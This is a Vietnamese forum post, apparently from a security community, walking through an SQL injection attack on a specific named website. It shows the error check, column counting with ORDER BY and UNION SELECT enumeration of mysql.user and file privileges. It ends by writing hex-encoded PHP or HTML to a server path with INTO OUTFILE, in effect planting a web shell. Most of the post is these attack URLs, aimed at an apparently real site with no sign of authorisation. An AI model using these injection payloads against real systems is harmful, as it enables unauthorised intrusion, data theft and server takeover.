Tận dụng SQL Injection upload file với quyền root

Thảo luận trong 'Web Security' bắt đầu bởi DdosFulzac, 29/07/19, 11:07 AM.

  1. DdosFulzac

    DdosFulzac Member

    Tham gia: 25/07/18, 07:07 PM
    Bài viết: 16
    Đã được thích: 7
    Điểm thành tích:
    3
    Hôm nay sẽ hướng dẫn các bạn tận dụng lỗi sql injection upload file với quyền root.Có lẽ tut này có nhiều bạn biết và đương nhiên cũng có những bạn không biết.Bài này dành các bạn đã biết khai thác sqli cơ bản và nâng cao.Thôi vô chém gió nhiều vcl
    site:http://lexsite.com/Homepage/WNmore.php?CatId=12
    Tiến hành check lỗi như bình thường
    http://lexsite.com/Homepage/WNmore.php?CatId=12'
    [​IMG]

    Tiếp theo ta thực hiện đếm cột: order by
    http://lexsite.com/Homepage/WNmore.php?CatId=12 order by 100-- - Lỗi
    http://lexsite.com/Homepage/WNmore.php?CatId=12 order by 50-- - Lỗi
    http://lexsite.com/Homepage/WNmore.php?CatId=12 order by 20- - Lỗi
    http://lexsite.com/Homepage/WNmore.php?CatId=12 order by 10-- - Lỗi
    http://lexsite.com/Homepage/WNmore.php?CatId=12 order by 9-- - Lỗi
    http://lexsite.com/Homepage/WNmore.php?CatId=12 order by 8-- - Không lỗi
    Rùi tìm cột bị lỗi rùi khai thác
    http://lexsite.com/Homepage/WNmore.php?CatId=12+UNION+ALL+SELECT+1,2,3,4,5,6,7,8-- -

    [​IMG]

    Các cột lỗi: 2,4,7,8,6
    ta tiến hành tìm user :
    http://lexsite.com/Homepage/WNmore.php?CatId=12+UNION+ALL+SELECT+1,user,3,4,5,6,7,8 from mysql.user-- -
    [​IMG]
    Ta sẽ check đặc quyền root user
    http://lexsite.com/Homepage/WNmore....T+1,concat_ws(':',user,file_priv),3,4,5,6,7,8 from mysql.user-- -
    result: root:Y
    check tiếp: http://lexsite.com/Homepage/WNmore....RMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8-- -
    [​IMG]
    Tiến hành upload file thui:
    http://lexsite.com/Homepage/WNmore.php?CatId=12+UNION+ALL+SELECT+1,2,3,code html hay php chuyển sang dạng hex,5,6,7,8 INTO OUTFILE 'F:/ContentSite/HomePage/p.txt'-- -
    Thành Quả:
    [​IMG]

    Video:
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    zzvenuszz and DDos like this.